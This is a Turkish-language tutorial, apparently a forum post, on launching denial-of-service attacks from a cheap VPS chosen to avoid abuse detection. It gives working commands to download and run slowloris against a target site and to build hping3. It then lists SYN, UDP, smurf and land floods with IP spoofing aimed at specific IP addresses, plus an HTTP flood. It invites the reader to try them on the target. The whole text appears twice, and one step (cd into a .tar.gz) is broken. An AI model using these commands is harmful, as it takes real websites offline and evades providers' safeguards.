Ev bilgisayarlarının bağlantı gücü sınırlı olduğundan (5mbit - 8mbit) Dos saldırıları yeterince güçlü olmuyor. Güçlü bir saldırı için yüksek bağlantıya sahip VPSler ideal.
Öncelikle kendimize ucuz ve salaş bir vps lazım. Hostgator, Godaddy gibi büyük firmaları tavsiye etmiyorum. Çünkü bu firmaların fiyatları hem yüksek hem de saldırı tespiti yapıp hesabınızı kapatıyorlar. Bunun için ucuz firmalara yönelmek daha mantıklı.
Googleda "cheap linux vps" şeklinde arama yapıp bu firmalara ulaşabilirsiniz. Ben sshvm.comu kullanıyorum. Hem fiyatları uygun hem de isviçre lokasyonlu.
Saldırı için kullanacağımız iki tool var. Birincisi slowloris, ikincisi hping.
Slowloris apache kullanan serverları devre dışı bırakmak için ideal bir tool.
Başlayalım.
Öncelikle putty kullanarak serverımıza bağlanıyoruz. Daha sonra yazma izni olan bir dizine geçiyo
wget http://ha.ckers.org/slowloris/slowloris.pl
komutuyla scripti serverımıza çekelim
slowlorisin kullandığı bazı perl kütüphaneleri var.
perl -MCPAN -e install IO::Socket::INET
perl -MCPAN -e install IO::Socket::SSL
komutlarıyla onları da yükleyelim. chmod +x slowloris.pl komutuyla izinlerimizi de verelim. Script kullanılmaya hazır.
./slowloris.pl -dns www.site.com -port 80 -num 800
komutuyla hedef sitenin 80 numaralı portuna Dos saldırısı başlattık.
karşı taraf apache server kullanıyorsa ve antiloris modülü yoksa büyük ihtimalle down olacaktır. Slowloris tcp saldırısı yaptığı için ip spoof mümkün olmamakta.
Hping kurulumu için de
wget http://www.hping.org/hping3-20051105.tar.gz
ile dosyayı serverımıza çekelim. daha sonra
tar -xvzf hping3-20051105.tar.gz
komutuyla tar.gz dosyamızı açıyoruz. sonra
cd hping3-20051105.tar.gz
komutuyla dizine geçelim. sırasıyla
./configure
make
make install
komutlarıyla hpingi kuruyoruz. Şimdi hping komutlarından bahsedelim biraz
smurf attack:
hping3 -1 --flood -a 67.23.35.104 127.0.0.1
syn flood:
hping -i u1 -S -p 80 65.254.248.146
hping rand-source 67.23.35.104 flood -S -L 0 -p 80
Udp Flood:
hping3 --flood --rand-source -c 1 --udp -p 53 65.254.248.146
Http Flood:
ab -c 1000 -n 30000 http://www.site.com/
Land attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source 65.254.248.146
komutlarını hedef site üzerinde test edip en etkilisini kendiniz seçebilirsiniz.
--rand-source komutu random IPler üreterek ip spoofing yapar. Örnek bir saldırı
ve saldırının sonucu
Öncelikle kendimize ucuz ve salaş bir vps lazım. Hostgator, Godaddy gibi büyük firmaları tavsiye etmiyorum. Çünkü bu firmaların fiyatları hem yüksek hem de saldırı tespiti yapıp hesabınızı kapatıyorlar. Bunun için ucuz firmalara yönelmek daha mantıklı.
Googleda "cheap linux vps" şeklinde arama yapıp bu firmalara ulaşabilirsiniz. Ben sshvm.comu kullanıyorum. Hem fiyatları uygun hem de isviçre lokasyonlu.
Saldırı için kullanacağımız iki tool var. Birincisi slowloris, ikincisi hping.
Slowloris apache kullanan serverları devre dışı bırakmak için ideal bir tool.
Başlayalım.
Öncelikle putty kullanarak serverımıza bağlanıyoruz. Daha sonra yazma izni olan bir dizine geçiyo
wget http://ha.ckers.org/slowloris/slowloris.pl
komutuyla scripti serverımıza çekelim
slowlorisin kullandığı bazı perl kütüphaneleri var.
perl -MCPAN -e install IO::Socket::INET
perl -MCPAN -e install IO::Socket::SSL
komutlarıyla onları da yükleyelim. chmod +x slowloris.pl komutuyla izinlerimizi de verelim. Script kullanılmaya hazır.
./slowloris.pl -dns www.site.com -port 80 -num 800
komutuyla hedef sitenin 80 numaralı portuna Dos saldırısı başlattık.
karşı taraf apache server kullanıyorsa ve antiloris modülü yoksa büyük ihtimalle down olacaktır. Slowloris tcp saldırısı yaptığı için ip spoof mümkün olmamakta.
Hping kurulumu için de
wget http://www.hping.org/hping3-20051105.tar.gz
ile dosyayı serverımıza çekelim. daha sonra
tar -xvzf hping3-20051105.tar.gz
komutuyla tar.gz dosyamızı açıyoruz. sonra
cd hping3-20051105.tar.gz
komutuyla dizine geçelim. sırasıyla
./configure
make
make install
komutlarıyla hpingi kuruyoruz. Şimdi hping komutlarından bahsedelim biraz
smurf attack:
hping3 -1 --flood -a 67.23.35.104 127.0.0.1
syn flood:
hping -i u1 -S -p 80 65.254.248.146
hping rand-source 67.23.35.104 flood -S -L 0 -p 80
Udp Flood:
hping3 --flood --rand-source -c 1 --udp -p 53 65.254.248.146
Http Flood:
ab -c 1000 -n 30000 http://www.site.com/
Land attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source 65.254.248.146
komutlarını hedef site üzerinde test edip en etkilisini kendiniz seçebilirsiniz.
--rand-source komutu random IPler üreterek ip spoofing yapar. Örnek bir saldırı
ve saldırının sonucu
